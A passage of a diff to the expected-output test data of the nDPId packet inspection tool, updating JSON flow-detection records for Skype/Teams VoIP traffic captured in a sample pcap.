00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657448,"flow_last_seen":1431970657448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970657448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51247,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431970657448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657448,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHFJAAEAGizfAqAEinTg0LMgvAbu6eq5bAAAAALAC\/\/9TfQAAAgQFtAEDAwUBAQgKPjHfXgAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1431970657789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970657789,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7yC\/usf9LunquXKASOJDxVgAAAgQFrAQCCApMaAAoPjHfXgEDAwk="} 
@@ -390,119 +390,119 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAABAUUpAAEAGahfAqAEib91Nr8gwnF4IVezmAAAAALAC\/\/8+qQAAAgQFtAEDAwUBAQgKPjHhAAAAAAAEAgAA"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9oHUAAEARRyvAqAEinTg0DTLdnFUAKQgoezEC\/l8nlzJZpnLIFE7P8fkc8mrPmKIpl9hxLirEQuOc"} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4f1AAAEARf6LAqAEib91KGzLdnFsAJDT4ezMCrsyhXN3LQtIkyb75hiLtvYPm8jFPNUJJrw=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qWkAAEARhrHAqAEinTfrkjLdgQkAKiNZezUC\/2slHaKqOmhTH+zKnxlHa\/OJZyFRbGPJo\/ii7tiMOQ=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA13XsAAEARu5rAqAEinTeCoDLdnEgAIdXCezcCHsxzqj9mHv\/LaKdjYymm7xXHyFOeHw=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9HFoAAEARyynAqAEinTg0KjLdnEUAKXprezkCzIUWKH677Ew8QeRY2LFi0olqYWN\/wfRNYM+xO4zo"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MmQAAEARtULAqAEinTg0EDLdnGAAINARezsCntsIeaNpS6NjCmJc+OoOrMkvCcDa"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAABAykUAAEARZUbAqAEi1cezjzLdnFIALAJQez0CXU0wVq4fYZh\/Y+8+QJuiiaVycN5JEmy9Mj2R1c64L1Y6"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lJ0AAEARm2LAqAEinTfrsDLdnF8AJ1FIez8C0TqVtIrtp1zqD0lx1wHOKMmPMNUvlfjRgE8UFg=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4HuEAAEARyLnAqAEinTg0GDLdnGAAJDiFe0ECGzhHlfYpbTJCQlYvElI0z7NbdWF7vdKvag=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Lr4AAEAR0DTAqAEib91KFDLdnGEAK3JGe0MC70klwlgauZl1jUNJ9T6muSj9wXln3SVqW5QyJa+s4xA="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": 